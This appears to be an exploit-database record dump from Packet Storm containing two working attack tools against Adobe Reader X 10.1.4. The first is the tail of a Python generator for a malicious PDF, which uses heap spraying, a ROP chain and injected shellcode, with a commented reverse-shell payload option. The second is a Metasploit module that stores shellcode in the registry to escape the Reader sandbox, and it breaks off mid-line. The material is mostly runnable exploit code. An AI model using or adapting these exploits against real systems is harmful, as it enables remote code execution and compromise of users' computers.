\nspray.done = 1; \nutil.message(\"Generating holes done!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\"); \n} \n// After this the form layout is rendered and the bug triggered \n</script> \n</event> \n<event activity=\"docReady\" ref=\"$host\" name=\"event__docReady\"> \n<script contentType=\"application/x-javascript\"> \n// This script runs once the page is ready \nutil.message(\"DocReady\"); \nvar i; var j; \nvar found = -1; // Index of the overlapped string \nvar acro = 0; // Base of the AcroRd32_dll \n \n// Search over all strings for the first one with the broken TOKEN \nfor (i=0; i < spray.size; i+=1) \nif ((spray.x[i]!=null) && (spray.x[i][0] != \"\\u5858\")){ \nfound = i; \nacro = (( util.unpackAt(spray.x[i], 14) >> 16) - util.offset(\"acrord32\")) << 16; \nutil.message(\"Found! String number \"+ found + \" has been corrupted acrord32.dll:\" + acro.toString(16) ); \nbreak; \n} \n// Behaviour is mostly undefined if not found \nif (found == -1){ \nutil.message(\"Corrupted String NOT Found!\"); \nevent.target.closeDoc(true); \n} \n \n// Corrupted string was found let's generates the new \n// string for overlapping the struct before freeing it \nvar chunky = \"\"; \nfor (i=0; i < 7; i+=1) \nchunky += util.pack(0x41414141); \nchunky += util.pack(0x10101000); \nwhile (chunky.length < spray.slide_size/2) \nchunky += util.pack(0x58585858); \n \n// Free the overlapping string \nutil.message(\"Feeing corrupted string! Previous string will we used-free (\"+(found)+\")\"); \nfor (j=0; j < 100000; j++) \nspray.x[found-1]=spray.x[found]=null; \n \n// Trigger several allocs that will fall over the structure \nfor (i=0; i < 200; i+=1){ \nID = \"\" + i; \nspray.y[i] = chunky.substring(0,spray.slide_size/2-ID.length) + ID+ \"\"; \n} \nutil.message(\"Allocated 20 chunks-y\\\\n\"); \n \n// Heap spraying make's baby jesus cry! \n// Construct the 0x1000 small chunk for spraying \nvar obj = 0x10101000; \nvar pointer_slide = \"\"; \npointer_slide += util.pack(acro+util.offset(\"rop4\")); //add esp,70;ret \nfor (i=0; i < 27; i+=1) \npointer_slide += util.pack(0x41414141); \nobj += pointer_slide.length*2; \n// ROP \npointer_slide += util.pack(acro+util.offset(\"rop0\")); //XCHG EAX,ESP;ret \npointer_slide += util.pack(acro+util.offset(\"rop1\")); //0x100A jmp getmodule \npointer_slide += util.pack(acro+util.offset(\"rop2\")); //@0x04 - getProcAddress \npointer_slide += util.pack(obj+0xDC); //@0x08 point to KERNEL32 \n//@0x10 \npointer_slide += util.pack(obj+0xCC); \npointer_slide += util.pack(0x43434343); // POPPED TO EBP \npointer_slide += util.pack(acro+util.offset(\"rop3\")); // JMP EAX \npointer_slide += util.pack(obj); //Points to offset 0 of this \n//@0x20 \npointer_slide += util.pack(obj+0x38); \npointer_slide += util.pack(obj+0x38); \npointer_slide += util.pack(0x1000); //SIZE_T dwSize, \npointer_slide += util.pack(0x40); // DWORD flNewProtect, \n//0x30 \npointer_slide += util.pack(obj+0x34); //PDWORD lpflOldProtect \npointer_slide += util.pack(0x00000000); //DWORD OldProtect \npointer_slide += util.packhs(\"E9B1000000909090\"); \n//0x40 \npointer_slide += util.pack(acro); //Used by next stage \npointer_slide += util.pack(0xCCCCCCCC); \npointer_slide += util.pack(0xCCCCCCCC); \npointer_slide += util.pack(0xCCCCCCCC); \n//0x50 \npointer_slide += util.pack(0xCCCCCCCC); \npointer_slide += util.pack(0xCCCCCCCC); \npointer_slide += util.pack(0xCCCCCCCC); \npointer_slide += util.pack(0xCCCCCCCC); \n//0x60 \npointer_slide += util.pack(0xCCCCCCCC); \npointer_slide += util.pack(0xCCCCCCCC); \npointer_slide += util.pack(0xCCCCCCCC); \npointer_slide += util.pack(0xCCCCCCCC); \n//0x70 \npointer_slide += util.pack(acro); \npointer_slide += util.pack(0x48484848); \npointer_slide += util.pack(0x49494949); \npointer_slide += util.pack(0x49494949); \n \n//0x80 \npointer_slide += util.pack(0x49494949); \npointer_slide += util.pack(0x50505050); \npointer_slide += util.pack(0x46464646); \npointer_slide += util.pack(0x46464646); \n//0x90 \npointer_slide += util.pack(0x46464646); \npointer_slide += util.pack(0x46464646); \npointer_slide += util.pack(0x46464646); \npointer_slide += util.pack(0x46464646); \n//0xa0 \npointer_slide += util.pack(0x46464646); \npointer_slide += util.pack(0x46464646); \npointer_slide += util.pack(0x46464646); \npointer_slide += util.pack(0x46464646); \n//0xb0 \npointer_slide += util.pack(0x46464646); \npointer_slide += util.pack(0x46464646); \npointer_slide += util.pack(0x46464646); \npointer_slide += util.pack(0x46464646); \n//0xc0 \npointer_slide += util.pack(0x46464646); \npointer_slide += util.pack(0x46464646); \npointer_slide += util.pack(0xCCCCCCCC); \npointer_slide += util.packs(\"VirtualProtect\"); //@0xCC \npointer_slide += \"\\u0000\"; \npointer_slide += \"KERNEL32\"; \npointer_slide += \"\\u0000\"; \npointer_slide += \"%%SHELLCODE%%\"; \nwhile (pointer_slide.length < 0x1000/2) \npointer_slide += util.pack(0x41414141); \npointer_slide = pointer_slide.substring(0,0x1000/2); \nutil.message(\"Pointer slide size: \" + pointer_slide.length); \n \n// And now ensure it gets bigger than 0x100000 bytes \nwhile (pointer_slide.length < 0x100000/2) \npointer_slide += pointer_slide; \n// And the actual spray \nfor (i=0; i < 100; i+=1) \nspray.pointers[i] = pointer_slide.substring(16, 0x100000/2-16-2)+ util.pack(i) + \"\"; \n \n// Everything done here close the doc and \n// trigger the use of the vtable \nutil.message(\"Now what?\"); \nvar pdfDoc = event.target; \npdfDoc.closeDoc(true); \n \n</script> \n</event> \n</subform> \n<?originalXFAVersion http://www.xfa.org/schema/xfa-template/2.5/?> \n<?templateDesigner DefaultLanguage JavaScript?> \n<?templateDesigner DefaultRunAt client?> \n<?acrobat JavaScript strictScoping?> \n<?PDFPrintOptions embedViewerPrefs 0?> \n<?PDFPrintOptions embedPrintOnFormOpen 0?> \n<?PDFPrintOptions scalingPrefs 0?> \n<?PDFPrintOptions enforceScalingPrefs 0?> \n<?PDFPrintOptions paperSource 0?> \n<?PDFPrintOptions duplexMode 0?> \n<?templateDesigner DefaultPreviewType interactive?> \n<?templateDesigner DefaultPreviewPagination simplex?> \n<?templateDesigner XDPPreviewFormat 19?> \n<?templateDesigner DefaultCaptionFontSettings face:Myriad Pro;size:10;weight:normal;style:normal?> \n<?templateDesigner DefaultValueFontSettings face:Myriad Pro;size:10;weight:normal;style:normal?> \n<?templateDesigner Zoom 119?> \n<?templateDesigner FormTargetVersion 30?> \n<?templateDesigner SaveTaggedPDF 1?> \n<?templateDesigner SavePDFWithEmbeddedFonts 1?> \n<?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?></template> \n<config xmlns=\"http://www.xfa.org/schema/xci/3.0/\"> \n<agent name=\"designer\"> \n \n<destination>pdf</destination> \n<pdf> \n \n<fontInfo/> \n</pdf> \n</agent> \n<present> \n \n<pdf> \n \n<version>1.7</version> \n<adobeExtensionLevel>5</adobeExtensionLevel> \n</pdf> \n<common/> \n<xdp> \n<packets>*</packets> \n</xdp> \n</present> \n</config> \n<localeSet xmlns=\"http://www.xfa.org/schema/xfa-locale-set/2.7/\"> \n<locale name=\"en_US\" desc=\"English (United States)\"> \n<calendarSymbols name=\"gregorian\"> \n<monthNames> \n<month>January</month> \n<month>February</month> \n<month>March</month> \n<month>April</month> \n<month>May</month> \n<month>June</month> \n<month>July</month> \n<month>August</month> \n<month>September</month> \n<month>October</month> \n<month>November</month> \n<month>December</month> \n</monthNames> \n<monthNames abbr=\"1\"> \n<month>Jan</month> \n<month>Feb</month> \n<month>Mar</month> \n<month>Apr</month> \n<month>May</month> \n<month>Jun</month> \n<month>Jul</month> \n<month>Aug</month> \n<month>Sep</month> \n<month>Oct</month> \n<month>Nov</month> \n<month>Dec</month> \n</monthNames> \n<dayNames> \n<day>Sunday</day> \n<day>Monday</day> \n<day>Tuesday</day> \n<day>Wednesday</day> \n<day>Thursday</day> \n<day>Friday</day> \n<day>Saturday</day> \n</dayNames> \n<dayNames abbr=\"1\"> \n<day>Sun</day> \n<day>Mon</day> \n<day>Tue</day> \n<day>Wed</day> \n<day>Thu</day> \n<day>Fri</day> \n<day>Sat</day> \n</dayNames> \n<meridiemNames> \n<meridiem>AM</meridiem> \n<meridiem>PM</meridiem> \n</meridiemNames> \n<eraNames> \n<era>BC</era> \n<era>AD</era> \n</eraNames> \n</calendarSymbols> \n<datePatterns> \n<datePattern name=\"full\">EEEE, MMMM D, YYYY</datePattern> \n<datePattern name=\"long\">MMMM D, YYYY</datePattern> \n<datePattern name=\"med\">MMM D, YYYY</datePattern> \n<datePattern name=\"short\">M/D/YY</datePattern> \n</datePatterns> \n<timePatterns> \n<timePattern name=\"full\">h:MM:SS A Z</timePattern> \n<timePattern name=\"long\">h:MM:SS A Z</timePattern> \n<timePattern name=\"med\">h:MM:SS A</timePattern> \n<timePattern name=\"short\">h:MM A</timePattern> \n</timePatterns> \n<dateTimeSymbols>GyMdkHmsSEDFwWahKzZ</dateTimeSymbols> \n<numberPatterns> \n<numberPattern name=\"numeric\">z,zz9.zzz</numberPattern> \n<numberPattern name=\"currency\">$z,zz9.99|($z,zz9.99)</numberPattern> \n<numberPattern name=\"percent\">z,zz9%</numberPattern> \n</numberPatterns> \n<numberSymbols> \n<numberSymbol name=\"decimal\">.</numberSymbol> \n<numberSymbol name=\"grouping\">,</numberSymbol> \n<numberSymbol name=\"percent\">%</numberSymbol> \n<numberSymbol name=\"minus\">-</numberSymbol> \n<numberSymbol name=\"zero\">0</numberSymbol> \n</numberSymbols> \n<currencySymbols> \n<currencySymbol name=\"symbol\">$</currencySymbol> \n<currencySymbol name=\"isoname\">USD</currencySymbol> \n<currencySymbol name=\"decimal\">.</currencySymbol> \n</currencySymbols> \n<typefaces> \n<typeface name=\"Myriad Pro\"/> \n<typeface name=\"Minion Pro\"/> \n<typeface name=\"Courier Std\"/> \n<typeface name=\"Adobe Pi Std\"/> \n<typeface name=\"Adobe Hebrew\"/> \n<typeface name=\"Adobe Arabic\"/> \n<typeface name=\"Adobe Thai\"/> \n<typeface name=\"Kozuka Gothic Pro-VI M\"/> \n<typeface name=\"Kozuka Mincho Pro-VI R\"/> \n<typeface name=\"Adobe Ming Std L\"/> \n<typeface name=\"Adobe Song Std L\"/> \n<typeface name=\"Adobe Myungjo Std M\"/> \n</typefaces> \n</locale> \n<?originalXFAVersion http://www.xfa.org/schema/xfa-locale-set/2.1/?></localeSet> \n<xfa:datasets xmlns:xfa=\"http://www.xfa.org/schema/xfa-data/1.0/\"> \n<xfa:data xfa:dataNode=\"dataGroup\"/> \n</xfa:datasets> \n<x:xmpmeta xmlns:x=\"adobe:ns:meta/\" x:xmptk=\"Adobe XMP Core 5.2-c001 63.139439, 2011/06/07-10:39:26 \"> \n<rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\"> \n<rdf:Description xmlns:xmp=\"http://ns.adobe.com/xap/1.0/\" rdf:about=\"\"> \n<xmp:MetadataDate>2012-11-23T13:41:54Z</xmp:MetadataDate> \n<xmp:CreatorTool>Adobe LiveCycle Designer ES 10.0</xmp:CreatorTool> \n<xmp:ModifyDate>2012-11-23T05:26:02-08:00</xmp:ModifyDate> \n<xmp:CreateDate>2012-11-23T05:15:47-08:00</xmp:CreateDate> \n</rdf:Description> \n<rdf:Description xmlns:pdf=\"http://ns.adobe.com/pdf/1.3/\" rdf:about=\"\"> \n<pdf:Producer>Adobe LiveCycle Designer ES 10.0</pdf:Producer> \n</rdf:Description> \n<rdf:Description xmlns:xmpMM=\"http://ns.adobe.com/xap/1.0/mm/\" rdf:about=\"\"> \n<xmpMM:DocumentID>uuid:0aa46f9b-2c50-42d4-ab0b-1a1015321da7</xmpMM:DocumentID> \n<xmpMM:InstanceID>uuid:86c66599-7238-4e9f-8fad-fe2cd922afb2</xmpMM:InstanceID> \n</rdf:Description> \n<rdf:Description xmlns:dc=\"http://purl.org/dc/elements/1.1/\" rdf:about=\"\"> \n<dc:format>application/pdf</dc:format> \n</rdf:Description> \n</rdf:RDF> \n</x:xmpmeta> \n<xfdf xmlns=\"http://ns.adobe.com/xfdf/\" xml:space=\"preserve\"> \n<annots/> \n</xfdf></xdp:xdp> \n''' \nassert len(shellcode) <= 0xF00, \"You need a smaller shellcode, sorry\" \n \n#shellcode \nxdp = xdp.replace(\"%%SHELLCODE%%\",UEncode(shellcode)) \nxdp = xdp.replace(\"%%SLIDESIZE%%\", \"0x%x\"%SLIDESIZE); \nxdp = xdp.replace(\"%%MINICHUNKX%%\",UEncode('O'*SLIDESIZE)) \nxdp = xdp.replace(\"%%BMPFREELFH%%\",mkBMP('\\x01\\x00\\x00\\x00\\x00\\x00'+ chr(0x27)+'\\x05',True).encode('base64')) \n#xdp = xdp.replace(\"%%BMPFREELFH%%\",file(\"/usr/share/pixmaps/gnome-news.png\",\"rb\").read().encode('base64')) \n \nfile(\"%s.log\"%sys.argv[0].split('.')[0],'wb').write(xdp) \n#The document \ndoc = PDFDoc() \n \n#font \nfont = PDFDict() \nfont.add(\"Name\", PDFName(\"F1\")) \nfont.add(\"Subtype\", PDFName(\"Type1\")) \nfont.add(\"BaseFont\", PDFName(\"Helvetica\")) \n \n#name:font map \nfontname = PDFDict() \nfontname.add(\"F1\",font) \n \n#resources \nresources = PDFDict() \nresources.add(\"Font\",fontname) \n \n#contents \ncontentsDict = PDFDict() \ncontents= PDFStream(contentsDict, '''BT \n/F1 24 Tf \n100 100 Td \n(Pedefe Pedefeito Pedefeon!) Tj \nET''') \n \n#page \npage = PDFDict() \npage.add(\"Type\",PDFName(\"Page\")) \npage.add(\"Resources\",resources) \npage.add(\"Contents\", PDFRef(contents)) \n \n#pages \npages = PDFDict() \npages.add(\"Type\", PDFName(\"Pages\")) \npages.add(\"Kids\", PDFArray([PDFRef(page)])) \npages.add(\"Count\", PDFNum(1)) \n \n#add parent reference in page \npage.add(\"Parent\",PDFRef(pages)) \n \nxfa = PDFStream(PDFDict(), xdp) \nxfa.appendFilter(FlateDecode()) \ndoc.add(xfa) \n \n#form \nform = PDFDict() \nform.add(\"XFA\", PDFRef(xfa)) \ndoc.add(form) \n \n#shellcode2 \nshellcode2 = PDFStream(PDFDict(), struct.pack(\"<L\",0xcac0face)+\"\\xcc\"*10) \ndoc.add(shellcode2) \n \n#catalog \ncatalog = PDFDict() \ncatalog.add(\"Type\", PDFName(\"Catalog\")) \ncatalog.add(\"Pages\", PDFRef(pages)) \ncatalog.add(\"NeedsRendering\", \"true\") \ncatalog.add(\"AcroForm\", PDFRef(form)) \n \n \nadbe = PDFDict() \nadbe.add(\"BaseVersion\",\"/1.7\") \nadbe.add(\"ExtensionLevel\",PDFNum(3)) \n \nextensions = PDFDict() \nextensions.add(\"ADBE\", adbe) \n \ncatalog.add(\"Extensions\",extensions) \ndoc.add([catalog,pages,page,contents]) \ndoc.setRoot(catalog) \n \n \n#render it \nreturn doc.__str__() \n \n \nif __name__ == '__main__': \nimport optparse,os \nfrom subprocess import Popen, PIPE \nparser = optparse.OptionParser(description='Adobe Reader X 10.1.4 XFA BMP RLE Exploit') \nparser.add_option('--debug', action='store_true', default=False, help='For debugging') \nparser.add_option('--msfpayload', metavar='MSFPAYLOAD', default=\"windows/messagebox \", help=\"Metasploit payload. Ex. 'win32_exec CMD=calc'\") \nparser.add_option('--payload', metavar='PAYLOAD', default=None) \nparser.add_option('--doc', action='store_true', default=False, help='Print detailed documentation') \n(options, args) = parser.parse_args() \n \nif options.doc: \nprint __doc__ \nos.exit(-1) \n \nif options.debug: \nprint mkXFAPDF(), \nos.exit(-1) \nif options.payload == None: \n#\"windows/meterpreter/reverse_tcp LHOST=192.168.56.1 EXITFUNC=process R\" \nmsfpayload = Popen(\"msfpayload4.4 %s R\"%options.msfpayload, shell=True, stdout=PIPE) \nshellcode = msfpayload.communicate()[0] \nelse: \nshellcode = file(options.payload, \"rb\").read() #options.hexpayload.decode('hex') \nprint mkXFAPDF(shellcode), \n \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/122309/adobereaderx-heap.txt"}, {"lastseen": "2016-12-05T22:15:21", "bulletinFamily": "exploit", "description": "", "modified": "2013-05-23T00:00:00", "published": "2013-05-23T00:00:00", "href": "https://packetstormsecurity.com/files/121711/AdobeCollabSync-Buffer-Overflow-Adobe-Reader-X-Sandbox-Bypass.html", "id": "PACKETSTORM:121711", "type": "packetstorm", "title": "AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \nrequire 'rex' \nrequire 'msf/core/post/windows/registry' \nrequire 'msf/core/post/common' \nrequire 'msf/core/post/file' \n \nclass Metasploit3 < Msf::Exploit::Local \nRank = GreatRanking \n \ninclude Msf::Exploit::EXE \ninclude Msf::Post::Common \ninclude Msf::Post::File \ninclude Msf::Post::Windows::Registry \n \ndef initialize(info={}) \nsuper(update_info(info, { \n'Name' => 'AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass', \n'Description' => %q{ \nThis module exploits a vulnerability on Adobe Reader X Sandbox. The \nvulnerability is due to a sandbox rule allowing a Low Integrity AcroRd32.exe \nprocess to write register values which can be used to trigger a buffer overflow on \nthe AdobeCollabSync component, allowing to achieve Medium Integrity Level \nprivileges from a Low Integrity AcroRd32.exe process. This module has been tested \nsuccessfully on Adobe Reader X 10.1.4 over Windows 7 SP1. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Felipe Andres Manzano', # Vulnerability discovery and PoC \n'juan vazquez' # Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2013-2730' ], \n[ 'OSVDB', '93355' ], \n[ 'URL', 'http://blog.binamuse.com/2013/05/adobe-reader-x-collab-sandbox-bypass.html' ] \n], \n'Arch' => ARCH_X86, \n'Platform' => 'win', \n'SessionTypes' => 'meterpreter', \n'Payload' => \n{ \n'Space' => 12288, \n'DisableNops' => true \n}, \n'Targets' => \n[ \n[ 'Adobe Reader X 10.1.4 / Windows 7 SP1', \n{ \n'AdobeCollabSyncTrigger' => 0x18fa0, \n'AdobeCollabSyncTriggerSignature' => \"\\x56\\x68\\xBC\\x00\\x00\\x00\\xE8\\xF5\\xFD\\xFF\\xFF\" \n} \n], \n], \n'DefaultTarget' => 0, \n'DisclosureDate'=> 'May 14 2013' \n})) \n \nend \n \ndef on_new_session \nprint_status(\"Deleting Malicious Registry Keys...\") \nif not registry_deletekey(\"HKCU\\\\Software\\\\Adobe\\\\Adobe Synchronizer\\\\10.0\\\\DBRecoveryOptions\\\\shellcode\") \nprint_error(\"Delete HKCU\\\\Software\\\\Adobe\\\\Adobe Synchronizer\\\\10.0\\\\DBRecoveryOptions\\\\shellcode by yourself\") \nend \nif not registry_deletekey(\"HKCU\\\\Software\\\\Adobe\\\\Adobe Synchronizer\\\\10.0\\\\DBRecoveryOptions\\\\bDeleteDB\") \nprint_error(\"Delete HKCU\\\\Software\\\\Adobe\\\\Adobe Synchronizer\\\\10.0\\\\DBRecoveryOptions\\\\bDeleteDB by yourself\") \nend \nprint_status(\"Cleanup finished\") \nend \n \n# Test the process integrity level by trying to create a directory on the TEMP folder \n# Access should be granted with Medium Integrity Level \n# Access should be denied with Low Integrity Level \n# Usint this solution atm because I'm experiencing problems with railgun when trying \n# use GetTokenInformation \ndef low_integrity_level? \ntmp_dir = expand_path(\"%TEMP%\") \ncd(tmp_dir) \nnew_dir = \"#{rand_text_alpha(5)}\" \nbegin \nsession.shell_command_token(\"mkdir #{new_dir}\") \nrescue \nreturn true \nend \n \nif directory?(new_dir) \nsession.shell_command_token(\"rmdir #{new_dir}\") \nreturn false \nelse \nreturn true \nend \nend \n \ndef check_trigger \nsignature = session.railgun.memread(@addresses['AcroRd32.exe'] + target['AdobeCollabSyncTrigger'], target['AdobeCollabSyncTriggerSignature'].length) \nif signature == target['AdobeCollabSyncTriggerSignature'] \nreturn true \nend \nreturn false \nend \n \ndef collect_addresses \n# find the trigger to launch AdobeCollabSyncTrigger.exe from AcroRd32.exe \n@addresses['trigger'] = @addresses['AcroRd32.exe'] + target['AdobeCollabSyncTrigger'] \nvprint_good(\"AdobeCollabSyncTrigger trigger address found at 0x#{@addresses['trigger'].to_s(16)}\") \n \n# find kernel32.dll \nkernel32 = session.railgun.kernel32.GetModuleHandleA(\"kernel32.dll\") \n@addresses['kernel32.dll'] = kernel32[\"return\"] \nif @addresses['kernel32.dll'] == 0 \nfail_with(Exploit::Failure::Unknown, \"Unable to find kernel32.dll\") \nend \nvprint_good(\"kernel32.dll address found at 0x#{@addresses['kernel32.dll'].to_s(16)}\") \n \n# find kernel32.dll methods \nvirtual_alloc = session.railgun.kernel32.GetProcAddress(@addresses['kernel32.dll'], \"VirtualAlloc\") \n@addresses['VirtualAlloc'] = virtual_alloc[\"return\"] \nif @addresses['VirtualAlloc'] == 0 \nfail_with(Exploit::Failure::Unknown, \"Unable to find VirtualAlloc\") \nend \nvprint_good(\"VirtualAlloc address found at 0x#{@addresses['VirtualAlloc'].to_s(16)}\") \n \nreg_get_value = session.railgun.kernel32.GetProcAddress(@addresses['kernel32.dll'], \"RegGetValueA\") \n@addresses['RegGetValueA'] = reg_get_value[\"return\"] \nif @addresses['RegGetValueA'] == 0 \nfail_with(Exploit::Failure::Unknown, \"Unable to find RegGetValueA\") \nend \nvprint_good(\"RegGetValueA address found at 0x#{@addresses['RegGetValueA'].to_s(16)}\") \n \n# find ntdll.dll \nntdll = session.railgun.kernel32.GetModuleHandleA(\"ntdll.dll\") \n@addresses['ntdll.dll'] = ntdll[\"return\"] \nif @addresses['ntdll.dll'] == 0 \nfail_with(Exploit::Failure::Unknown, \"Unable to find ntdll.dll\") \nend \nvprint_good(\"ntdll.dll address found at 0x#{@addresses['ntdll.dll'].to_s(16)}\") \nend \n \n# Search a gadget identified by pattern on the process memory \ndef search_gadget(base, offset_start, offset_end, pattern) \nmem = base + offset_start \nlength = offset_end - offset_start \nmem_contents = session.railgun.memread(mem, length) \nreturn mem_contents.index(pattern) \nend \n \n# Search for gadgets on ntdll.dll \ndef search_gadgets \nntdll_text_base = 0x10000 \nsearch_length = 0xd6000 \n \n@gadgets['mov [edi], ecx # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, \"\\x89\\x0f\\xc3\") \nif @gadgets['mov [edi], ecx # ret'].nil? \nfail_with(Exploit::Failure::Unknown, \"Unable to find gadget 'mov [edi], ecx # ret'\") \nend \n@gadgets['mov [edi], ecx # ret'] += @addresses['ntdll.dll'] \n@gadgets['mov [edi], ecx # ret'] += ntdll_text_base \nvprint_good(\"Gadget 'mov [edi], ecx # ret' found at 0x#{@gadgets['mov [edi], ecx # ret'].to_s(16)}\") \n \n@gadgets['ret'] = @gadgets['mov [edi], ecx # ret'] + 2 \nvprint_good(\"Gadget 'ret' found at 0x#{@gadgets['ret'].to_s(16)}\") \n \n@gadgets['pop edi # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, \"\\x5f\\xc3\") \nif @gadgets['pop edi # ret'].nil? \nfail_with(Exploit::Failure::Unknown, \"Unable to find gadget 'pop edi # ret'\") \nend \n@gadgets['pop edi # ret'] += @addresses['ntdll.dll'] \n@gadgets['pop edi # ret'] += ntdll_text_base \nvprint_good(\"Gadget 'pop edi # ret' found at 0x#{@gadgets['pop edi # ret'].to_s(16)}\") \n \n@gadgets['pop ecx # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, \"\\x59\\xc3\") \nif @gadgets['pop ecx # ret'].nil? \nfail_with(Exploit::Failure::Unknown, \"Unable to find gadget 'pop ecx # ret'\") \nend \n@gadgets['pop ecx # ret'] += @addresses['ntdll.dll'] \n@gadgets['pop ecx # ret'] += ntdll_text_base \nvprint_good(\"Gadget 'pop edi # ret' found at 0x#{@gadgets['pop ecx # ret'].to_s(16)}\") \nend \n \ndef store(buf, data, address) \ni = 0 \nwhile (i < data.length) \nbuf << [@gadgets['pop edi # ret']].pack(\"V\") \nbuf << [address + i].pack(\"V\") # edi \nbuf << [@gadgets['pop ecx # ret']].pack(\"V\") \nbuf << data[i, 4].ljust(4,\"\\x00\") # ecx \nbuf << [@gadgets['mov [edi], ecx # ret']].pack(\"V\") \ni = i + 4 \nend \nreturn i \nend \n \ndef create_rop_chain \nmem = 0x0c0c0c0c \n \nbuf = [0x58000000 + 1].pack(\"V\") \nbuf << [0x58000000 + 2].pack(\"V\") \nbuf << [0].pack(\"V\") \nbuf << [0x58000000 + 4].pack(\"V\") \n \nbuf << [0x58000000 + 5].pack(\"V\") \nbuf << [0x58000000 + 6].pack(\"V\") \nbuf << [0x58000000 + 7].pack(\"V\") \nbuf << [@gadgets['ret']].pack(\"V\") \nbuf << rand_text(8) \n \n# Allocate Memory To store the shellcode and the necessary data to read the \n# shellcode stored in the registry \nbuf << [@addresses['VirtualAlloc']].pack(\"V\") \nbuf << [@gadgets['ret']].pack(\"V\") \nbuf << [mem].pack(\"V\") # lpAddress \nbuf << [0x00010000].pack(\"V\") # SIZE_T dwSize \nbuf << [0x00003000].pack(\"V\") # DWORD flAllocationType \nbuf << [0x00000040].pack(\"V\") # flProtect \n \n# Put in the allocated memory the necessary data in order to read the \n# shellcode stored in the registry \n# 1) The reg sub key: Software\\\\Adobe\\\\Adobe Synchronizer\\\\10.0\\\\DBRecoveryOptions \nreg_key = \"Software\\\\Adobe\\\\Adobe Synchronizer\\\\10.0\\\\DBRecoveryOptions\\x00\" \nreg_key_length = store(buf, reg_key, mem) \n# 2) The reg entry: shellcode \nvalue_key = \"shellcode\\x00\" \nstore(buf, value_key, mem + reg_key_length) \n# 3) The output buffer size: 0x3000 \nsize_buffer = 0x3000 \nbuf << [@gadgets['pop edi # ret']].pack(\"V\") \nbuf << [mem + 0x50].pack(\"V\") # edi \nbuf << [@gadgets['pop ecx # ret']].pack(\"V\") \nbuf << [size_buffer].pack(\"V\") # ecx \nbuf << [@gadgets['mov [edi], ecx # ret']].pack(\"V\") \n \n# Copy the shellcode from the the registry to the \n# memory allocated with executable permissions and \n# ret into there \nbuf << [@addresses['RegGetValueA']].pack(\"V\") \nbuf << [mem + 0x1000].pack(\"V\") # ret to shellcode \nbuf << [0x80000001].pack(\"V\") # hkey => HKEY_CURRENT_USER \nbuf << [mem].pack(\"V\") # lpSubKey \nbuf << [mem + 0x3c].pack(\"V\") # lpValue \nbuf << [0x0000FFFF].pack(\"V\") # dwFlags => RRF_RT_ANY \nbuf << [0].pack(\"V\") # pdwType \nbuf << [mem + 0x1000].pack(\"V\") # pvData \nbuf << [mem + 0x50].pack(\"V\") # pcbData \nend \n \n# Store shellcode and AdobeCollabSync.exe Overflow trigger in the Registry \ndef store_data_registry(buf) \nvprint_status(\"Creating the Registry Key to store the shellcode...\") \n \nif registry_createkey(\"HKCU\\\\Software\\\\Adobe\\\\Adobe Synchronizer\\\\10.0\\\\DBRecoveryOptions\\\\shellcode\") \nvprint_good(\"Registry Key created\") \nelse \nfail_with(Exploit::Failure::Unknown, \"Failed to create the Registry Key to store the shellcode\") \nend \n \nvprint_status(\"Storing the shellcode in the Registry...\") \n \nif registry_setvaldata(\"HKCU\\\\Software\\\\Adobe\\\\Adobe Synchronizer\\\\10.0\\\\DBRecoveryOptions\", \"shellcode\", payload.encoded, \"REG_BINARY\") \nvprint_good(\"Shellcode stored\") \nelse \nfail_with(Exploit::Failure::Unknown, \"Failed to store shellcode in the Registry\") \nend \n \n# Create the Malicious registry entry in order to exploit.... \nvprint_status(\"Creating the Registry Key to trigger the Overflow...\") \nif registry_createkey(\"HKCU\\\\Software\\\\Adobe\\\\Adobe Synchronizer\\\\10.0\\\\DBRecoveryOptions\\\\bDeleteDB\") \nvprint_good(\"Registry Key created\") \nelse \nfail_with(Exploit::Failure::Unknown, \"Failed to create the Registry Entry to trigger the Overflow\") \nend \n \nvprint_status(\"Storing the trigger in the Registry...\") \nif registry_setvaldata(\"HKCU\\\\Software\\\\Adobe\\\\Adobe Synchronizer\\\\10.0\\\\DBRecoveryOptions\", \"bDeleteDB\", buf, \"REG_BINARY\") \nvprint_good(\"Trigger stored\") \nelse \nfail_with(Exploit::Failure::Unknown, \"Failed to store the trigger in the Registry\") \nend \nend \n \ndef trigger_overflow \nvprint_status(\"Creating the thread to trigger the Overflow on AdobeCollabSync.exe...\") \n# Create a thread in order to execute the necessary code to launch AdobeCollabSync \nret = session.railgun.kernel32.CreateThread(nil, 0, @addresses['trigger'], nil, \"CREATE_SUSPENDED\", nil) \nif ret['return'] < 1 \nprint_error(\"Unable to CreateThread\") \nreturn \nend \nhthread = ret['return'] \n \nvprint_status(\"Resuming the Thread...\") \n# Resume the thread to actually Launch AdobeCollabSync and trigger the vulnerability! \nret = client.railgun.kernel32.ResumeThread(hthread) \nif ret['return'] < 1 \nfail_with(Exploit::Failure::Unknown, \"Unable to ResumeThread\") \nend \nend \n \ndef check \n@addresses = {} \nacrord32 = session.railgun.kernel32.GetModuleHandleA(\"AcroRd32.exe\") \n@addresses['AcroRd32.exe'] = acrord32[\"return\"] \nif @addresses['AcroRd32.exe'] == 0 \nreturn Msf::Exploit::CheckCode::Unknown \nelsif check_trigger \nreturn Msf::Exploit::CheckCode::Vulnerable \nelse \nreturn Msf::Exploit::CheckCode::Detected \nend \nend \n \ndef exploit \n@addresses = {} \n@gadgets = {} \n \nprint_status(\"Verifying we're in the correct target process...\") \nacrord32 = session.railgun.kernel32.GetModuleHandleA(\"AcroRd32.exe\") \n@addresses['AcroRd32.exe'] = 